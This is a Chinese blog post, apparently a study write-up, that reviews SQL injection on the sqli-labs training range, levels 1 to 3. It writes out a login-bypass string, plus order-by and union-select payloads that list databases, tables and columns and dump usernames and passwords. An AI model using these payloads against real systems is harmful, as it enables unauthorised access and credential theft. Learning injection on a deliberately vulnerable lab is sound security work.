sql-labs学习

最新推荐文章于 2024-04-12 02:44:13 发布
最新推荐文章于 2024-04-12 02:44:13 发布
阅读量2.1k 收藏 4
点赞数 2
分类专栏: 寒假任务 文章标签: sql mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64286326/article/details/122815751
版权

前言:

年前学习过sql的知识,现在忘得差不多了,趁这个机会赶紧在复习一下。

1 万能密码

在mysql里面

-- 
#

他们都代表注释

我们在登陆框内输入账号密码,服务器会在数据库内进行查询,大概是这样

select * FROM user WHERE username= '111' AND password= '222'

假如我们在登录框内的username填写

1' or 1=1#

效果是这样

SELECT * FROM user WHERE username= '1' or 1=1#' AND password= '222'

密码的部分直接被注释了,并且会有一个or的判断,这样就可以绕过了。

2 常用语句

在此之前,我们要知道在MySQL中有information_schema这个库,该库存放了所有数据库的信息。
information_schema.columns包含所有表的字段
table_schema 数据库名
table_name 表名
column_name 列名
information_schema.tables包含所有库的表名
table_schema 数据库名
table_name 表名
information_schema.schemata包含所有数据库的名
schema_name 数据库名
group_concat()函数功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

查询的目的是让我们排除其他无用的信息,筛选有用的信息。

1 information_schema (元数据库,存储数据库相关信息的数据库)

SELECT schema_name FROM information_schema.schemata

我们可以查询所有数据库的name

SELECT table_name from information_schema.tables where table_schema= 'security'

这个命令比较绕口,就是从information_schema数据库中的tables表里查询 table_schema这个列中名字的是security行相对应的table_name的行名。

 接下来我们更进一步

select colum_name from information_schema.columns where 
table_schema= 'security' and table_name= 'emails'

有了第一次,第二次就容易理解了。

这是我们查询出来的的内容,我们可以进一步查询该数据库中的内容

比如

select * from emails
select id,email_id from emails

 

sql-labs(一)

一、判断注入点 

我们输入?id=1

 先判断下闭合符号,单引号报错

?id=1'
?id=1' --+

 

说明闭合符号是'

我们可以就可以进行注入了

二、判断列数

?id=1' order by 3 --+

经过测试是有3列 

我们试试联合查询

id=-1' union select 1,2,3 --+

 

这一步的目的是给数据库一个不存在的id,然后看出我们输入的数据在哪里显示出来

这样一来,我们就可以在2,3处显示自己想要的内容了。

三、爆数据库

?id=-1' union select 1,database(),3 --+

database()函数能够获知当前数据库。

 四、爆数据表

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

 五、爆字段

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users' --+

 六、爆值

?id=-1' union select 1,2,group_concat(username,0x3a,password) from users -- +

 其中的0x3a是16进制中的:,目的是便于我们观察

sql-labs(二)

一  判断注入类型

1' and '1'='1	
1 and 1=1

看页面回显位的反馈,如果一致,则是字符注入,否则就是数字注入。

 

所以less02是数字型注入 ,就不用了再添加闭合符号了

其他步骤跟第一关一样,所以我们直接获取账号密码

?id=-1 union SELECT 1,2,(select group_concat(username,0x3a,password) from users)

 

 sql-labs(三)

首先看一下注入类型

 是字符注入

先试一下闭合符号

?id=1'

所以闭合符号是

')

 其他的步骤一样的,直接上代码了就

?id= -1') union select 1,2,group_concat(username,0x3a,password) from users -- +

 

 

Hyang904
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master.zip sql注入的学习靶机
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
网络安全05-sql-labs靶场全网最详细总结
m0_68976043的博客
02-10 1728
sql注入有很多方式其中我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询中插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得关于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果中。通过在 SQL 查询中插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果中,从而泄露敏感信息。基
SQL-Labs从搭建到闯关(SQL注入天书)
Kevin's Blog
02-22 4599
一、介绍   sql-labs是一个学习sql注入的平台 二、环境搭建 GitHub项目地址:https://github.com/Audi-1/sqli-labs 》》启动phpstudy 》》将sql-labs解压到站点目录 》》进入到sqli-labs靶机站点,点击重置数据库即可在mysql中创建了数据库 》》进入到关卡1 三、注入类型 3.1 Less-1 字符型注入,基于错误的GET单引号 3.1.1 判断是否存在注入点 》》输入?id=1 显示出了数据库中第一行的数据 》》输入单引号
Sql-lab全解_sqllab
最新发布
2301_77033340的博客
04-12 674
这里推荐在password注入,因为会判断密码和账户的正确性,正确才会回显,如果这里在username注入则会比较麻烦经过测试这里回显位为2位得到数据库名称,和当前表名称得到表列得到数据。
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
sqli-labs实验指导手册
11-17
sqli-labs实验指导手册,通过搭建sqli-labs实验平台,对每一道题进行通关操作的讲解,帮助同学们学习和操作以及理解Sql注入的原理
sqllabs详解与知识点汇总(内含代码审计)
Samblue_M的博客
02-03 4953
sqllabs闯关记录 关于注释符的详解 SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 - impulse- - 博客园 (cnblogs.com) HTTP请求方法------GET 对比 POST HTTP 方法:GET 对比 POST | 菜鸟教程 (runoob.com) 来自知乎的绕过 SQL注入:各种绕过检测的姿势 - 知乎 (zhihu.com) Less-1~4 @读题-------------get方式提交 @Error based—报错注入 @Single quo
sql-labs
m0_74606212的博客
03-10 364
sql-labs
sql-labs 详解
m0_52314120的博客
03-28 1901
文章目录前言一、第一关1.and 1=2测试 :2.尝试闭合:3.尝试将 ‘ 注释4.利用order by函数爆字段数5.设置错误的id值使其通过报错带出查询结果6.判断回显点7.查询当前库名与用户8.联合查询爆库名9.爆表名10.查询user下的列名11.从username和password中得到账号密码二、第二关总结 前言 sql-labs的注入样例 若有不足请留言指正 一、第一关 1.and 1=2测试 : http://127.0.0.1/sql/Less-1/?id=1 2.尝试闭合: 127
Sql-labs靶场(1~28)
xhx836161547的博客
12-29 4667
sql注入经典靶场Sql-labs全关详解,正在加急更新中
史上最详细的sql-labs通关秘籍less1-4
weixin_50644728的博客
11-24 737
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
sql-labs 1-10关 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
sqli-labs 1-10(GET型注入)新手通关详解(高手误入)
b1n的博客
07-16 2461
1.第一关是单引号字符型注入2.用--+进行注释,页面正常显示。
web安全sql注入篇——sqls-labs的安装和注入
m0_68167825的博客
06-10 1880
我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。注意: mysql 版本一定要设置成 php5 以上,php5 以上才有 information_schema 库。SQLi-Labs 是一个专业的 SQL 注入练习平台,它适用于 GET 和 POST 等多场景的注入。使用 phpSt
sql-labs靶场环境搭建
ljlrookiebird的博客
03-29 2661
有可能mysql无法打开,应该是和你本地的mysql冲突了,找到命令提示符界面右键使用管理员打开后,输入命令:sc delete mysql,删除你本地的mysql,记住用管理员打开,否则可能没有权限导致无法删除,删除后即可在phpstudy面板正常启动mysql服务。最近突然想对网安知识进行复习,然后就想起之前做过的sql-labs靶场,这个靶场对于我们学习sql注入的知识还是比较有帮助的,接下来我就记录下我的闯关过程吧,本文章一共分为环境搭建和闯关两部分。初始化完成后就可以愉快的开始闯关了。
sql-labs靶场环境搭建(手把手教你如何搭建)
热门推荐
Joker_Dgh的博客
04-02 3万+
sqli-labs介绍 SQLI-LAB下载地址: https://github.com/Audi-1/sqli-labs WEB环境搭建: 在安装靶场之前,我们还需要搭建web运行环境: 这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn) 下载后安装即可。 Sql-labs靶场环境搭建 安装好phpst..
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sql-labs通关
m0_74013288的博客
10-15 162
查库:select schema_name from information_schema. schemata;查表: select table_name from information_schema.tables where table_schema='security';查列:select column_name form information_schema.columns where table_name='users';
sql-labs宽字节注入
07-28
宽字节注入是一种针对某些数据库的特殊注入攻击技术,它利用了某些数据库在处理字符编码转换时的漏洞。而 SQL-Labs 是一个用于学习和测试 SQL 注入漏洞的开源项目。 在宽字节注入中,攻击者通过在输入的数据中插入特殊编码的宽字节字符,绕过了数据库的输入过滤和检查,成功执行恶意的 SQL 语句。这种攻击技术主要针对使用双字节字符集编码(如 GBK、Big5 等)的数据库SQL-Labs 提供了一系列预设的 SQL 注入漏洞场景,供学习者测试和练习。通过 SQL-Labs,你可以了解和学习如何利用不同的注入技巧来攻击和利用数据库漏洞,并学习如何防范和修复这些漏洞。 如果你想了解更多关于宽字节注入和 SQL-Labs 的内容,你可以参考相关的安全资料和文档,并按照合法和道德的方式进行学习和测试。同时,务必遵守法律法规和道德规范,不要利用这些知识进行非法和恶意的活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值